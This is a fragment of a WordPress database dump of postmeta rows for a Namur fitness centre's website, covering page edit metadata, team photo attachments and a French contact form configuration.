(456, 201, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873974:1\";}\";'),
(457, 201, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(458, 202, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(459, 202, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372874020:1\";}\";'),
(460, 202, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(461, 203, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(462, 203, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372874222:1\";}\";'),
(463, 203, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(464, 204, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(465, 204, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372874231:1\";}\";'),
(466, 204, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1510, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383771781:1\";}\";'),
(1509, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1508, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1507, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(476, 205, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(477, 205, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372874467:1\";}\";'),
(478, 205, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1506, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1505, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(482, 206, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(483, 206, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372874590:1\";}\";'),
(484, 206, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(485, 207, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(486, 207, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372874595:1\";}\";'),
(487, 207, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1504, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383771725:1\";}\";'),
(1503, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1502, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(494, 208, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(495, 208, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372875136:1\";}\";'),
(496, 208, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(497, 209, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(498, 209, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372875140:1\";}\";'),
(499, 209, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1501, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1500, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1499, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(506, 210, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(507, 210, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372875665:1\";}\";'),
(508, 210, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1498, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383771663:1\";}\";'),
(1497, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(512, 211, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(513, 211, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372875741:1\";}\";'),
(514, 211, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(515, 212, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(516, 212, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372875744:1\";}\";'),
(517, 212, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(518, 213, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(519, 213, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372875791:1\";}\";'),
(520, 213, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(521, 214, '_edit_last', '2'),
(522, 214, '_edit_lock', '1379449550:2'),
(523, 215, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(524, 215, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372875905:1\";}\";'),
(525, 214, '_wp_page_template', 'default'),
(590, 232, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:260;s:4:\"file\";s:31:\"2013/07/bertrand_bauwin-pti.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"bertrand_bauwin-pti-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:31:\"bertrand_bauwin-pti-200x224.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";d:2.79999999999999982236431605997495353221893310546875;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"Canon IXUS 115 HS\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1371661670;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"5\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";}}'),
(589, 232, '_wp_attached_file', '2013/07/bertrand_bauwin-pti.jpg'),
(535, 217, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(536, 217, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878126:1\";}\";'),
(537, 217, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(538, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(539, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878185:1\";}\";'),
(540, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(541, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(542, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878247:1\";}\";'),
(543, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(544, 219, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(545, 219, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878307:1\";}\";'),
(546, 219, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(547, 220, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(548, 220, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1371396454:1\";}\";'),
(549, 220, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(550, 221, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(551, 221, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1371395332:1\";}\";'),
(552, 221, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(553, 222, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(554, 222, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1371390907:1\";}\";'),
(555, 222, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(556, 223, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(557, 223, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878067:1\";}\";'),
(558, 223, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(559, 224, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(560, 224, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1371391117:1\";}\";'),
(561, 224, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(562, 225, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(563, 225, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878263:1\";}\";'),
(564, 225, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(565, 226, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(566, 226, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878525:1\";}\";'),
(567, 226, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(568, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(569, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878545:1\";}\";'),
(570, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(571, 227, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(572, 227, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878606:1\";}\";'),
(573, 227, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(574, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(575, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878621:1\";}\";'),
(576, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(577, 228, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(578, 228, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878682:1\";}\";'),
(579, 228, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(580, 229, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(581, 229, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878685:1\";}\";'),
(582, 229, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(583, 230, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(584, 230, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878742:1\";}\";'),
(585, 230, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(586, 231, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(587, 231, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878771:1\";}\";'),
(588, 231, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(591, 233, '_wp_attached_file', '2013/07/damien_pierrard-pti.jpg'),
(592, 233, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:260;s:4:\"file\";s:31:\"2013/07/damien_pierrard-pti.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"damien_pierrard-pti-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:31:\"damien_pierrard-pti-200x224.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";d:2.79999999999999982236431605997495353221893310546875;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"Canon IXUS 115 HS\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1371745494;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"5\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";}}'),
(593, 234, '_wp_attached_file', '2013/07/guelor-pti.jpg'),
(594, 234, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:261;s:4:\"file\";s:22:\"2013/07/guelor-pti.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"guelor-pti-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:22:\"guelor-pti-200x224.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:13:\"maxime devaux\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(595, 235, '_wp_attached_file', '2013/07/julie_pierrard-pti.jpg'),
(596, 235, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:260;s:4:\"file\";s:30:\"2013/07/julie_pierrard-pti.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"julie_pierrard-pti-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:30:\"julie_pierrard-pti-200x224.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";d:3.20000000000000017763568394002504646778106689453125;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"Canon IXUS 115 HS\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1372353169;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:5:\"7.015\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";}}'),
(597, 236, '_wp_attached_file', '2013/07/julien_meulemans-pti.jpg'),
(598, 236, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:260;s:4:\"file\";s:32:\"2013/07/julien_meulemans-pti.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"julien_meulemans-pti-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:32:\"julien_meulemans-pti-200x224.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";d:2.79999999999999982236431605997495353221893310546875;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"Canon IXUS 115 HS\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1371838525;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"5\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";}}'),
(599, 237, '_wp_attached_file', '2013/07/mathieu_gille-pti.jpg'),
(600, 237, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:259;s:4:\"file\";s:29:\"2013/07/mathieu_gille-pti.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"mathieu_gille-pti-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:29:\"mathieu_gille-pti-200x224.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";d:2.79999999999999982236431605997495353221893310546875;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"Canon IXUS 115 HS\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1372353078;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"5\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";}}'),
(601, 238, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(602, 238, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372879937:1\";}\";'),
(603, 238, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(604, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(605, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372879999:1\";}\";'),
(606, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(607, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(608, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880060:1\";}\";'),
(609, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(610, 239, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(611, 239, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880121:1\";}\";'),
(612, 239, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(613, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(614, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880132:1\";}\";'),
(615, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(616, 240, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(617, 240, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880193:1\";}\";'),
(618, 240, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(619, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(620, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880204:1\";}\";'),
(621, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(622, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(623, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880265:1\";}\";'),
(624, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(625, 241, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(626, 241, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880325:1\";}\";'),
(627, 241, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(628, 242, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(629, 242, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880328:1\";}\";'),
(630, 242, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(631, 243, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(632, 243, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880372:1\";}\";'),
(633, 243, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(634, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(635, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880396:1\";}\";'),
(636, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(637, 244, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(638, 244, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880457:1\";}\";'),
(639, 244, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(640, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(641, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880504:1\";}\";'),
(642, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(643, 245, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(644, 245, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880565:1\";}\";'),
(645, 245, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(646, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(647, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880573:1\";}\";'),
(648, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(649, 246, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(650, 246, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880634:1\";}\";'),
(651, 246, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(652, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(653, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880667:1\";}\";'),
(654, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(655, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(656, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880728:1\";}\";'),
(657, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(658, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(659, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880789:1\";}\";'),
(660, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(661, 247, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(662, 247, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880849:1\";}\";'),
(663, 247, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(664, 248, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(665, 248, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880864:1\";}\";'),
(666, 248, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(667, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(668, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880983:1\";}\";'),
(669, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(670, 249, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(671, 249, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881043:1\";}\";'),
(672, 249, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(673, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(674, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881061:1\";}\";'),
(675, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(676, 250, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(677, 250, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881123:1\";}\";'),
(678, 250, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(679, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(680, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881142:1\";}\";'),
(681, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(682, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(683, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881204:1\";}\";'),
(684, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(685, 251, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(686, 251, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881264:1\";}\";'),
(687, 251, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(688, 252, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(689, 252, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881267:1\";}\";'),
(690, 252, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(691, 253, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(692, 253, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881319:1\";}\";'),
(693, 253, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(694, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(695, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881349:1\";}\";'),
(696, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(697, 254, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(698, 254, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881410:1\";}\";'),
(699, 254, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(700, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(701, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881481:1\";}\";'),
(702, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(703, 255, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(704, 255, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881541:1\";}\";'),
(705, 255, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(706, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(707, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881549:1\";}\";'),
(708, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(709, 256, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(710, 256, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881641:1\";}\";'),
(711, 256, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1496, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(715, 257, '_form', '<p>Votre nom (obligatoire)<br />\n    [text* your-name] </p>\n\n<p>Votre email (obligatoire)<br />\n    [email* your-email] </p>\n\n<p>Sujet<br />\n    [text your-subject] </p>\n\n<p>Votre message<br />\n    [textarea your-message] </p>\n\n[captchac captcha-712]\n<p>Veuillez recopier les caractères ci-dessus<br />\n[captchar captcha-712]</p>\n\n<p>[submit \"Send\"]</p>'),
(716, 257, '_mail', 'a:7:{s:7:\"subject\";s:14:\"[your-subject]\";s:6:\"sender\";s:26:\"[your-name] <[your-email]>\";s:4:\"body\";s:192:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Cross Training Center (http://www.crosstrainingcenter.be)\";s:9:\"recipient\";s:25:\"juliepierrard@hotmail.com\";s:18:\"additional_headers\";s:0:\"\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;}'),
(717, 257, '_mail_2', 'a:8:{s:6:\"active\";b:0;s:7:\"subject\";s:14:\"[your-subject]\";s:6:\"sender\";s:26:\"[your-name] <[your-email]>\";s:4:\"body\";s:192:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Cross Training Center (http://www.crosstrainingcenter.be)\";s:9:\"recipient\";s:12:\"stv@otvr.net\";s:18:\"additional_headers\";s:0:\"\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;}'),
